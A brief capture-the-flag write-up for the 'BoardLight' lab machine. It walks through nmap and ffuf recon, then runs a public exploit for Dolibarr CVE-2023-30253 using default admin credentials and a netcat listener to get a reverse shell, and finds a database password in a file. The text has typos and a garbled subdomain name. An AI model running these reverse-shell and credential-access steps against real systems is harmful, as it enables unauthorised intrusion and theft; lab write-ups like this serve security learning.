BoardLight
Date: 14, jun, 2024
Author: H3cktor
Recon
Using NMAP to make Recon
nmap -sC -sV 10.10.11.11
-sV => Attempts to determine the version of the service running on port
-sC => Scan with default NSE scripts. Considered useful for discovery and safe

After the nmap scan we can see an apache server listening on port 80:
Lets add this to our host file:
sudo nano /etc/hosts

Lets first try to do a directory search to try to find any hidden files/directory's. I will use gobuster to do this:

Make subdomain enumeration Using FFUF
ffuf -H "Host: FUZZ.board.htb" -u http://10.10.11.11/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fw 6243

See i found the Subdomain crm.10.10.11.11

I Found the crm panel

Ok Now Found the Dolibarr version 17.0.0 and i Search in Google to get any CVE
i found Dolibarr-17.0.0-CVE-2023-30253
Reverse Shell POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)
, PHP Code Injection
sudo python3 exploit.py http://crm.board.htb admin admin <ip Your tun0> 9000
listen revers shell => Must run listening in First
nc -nvlp 9000
First I provided a listener and then executed the exploit.py file. Then I provided the credentials as well as my attacker ip and the listening port. After executing, I successfully got a reverse shell

B0000000M!

I cat Found in pass or Cardantional
put i see the user name larissa

I found the main database password in the file.


Last updated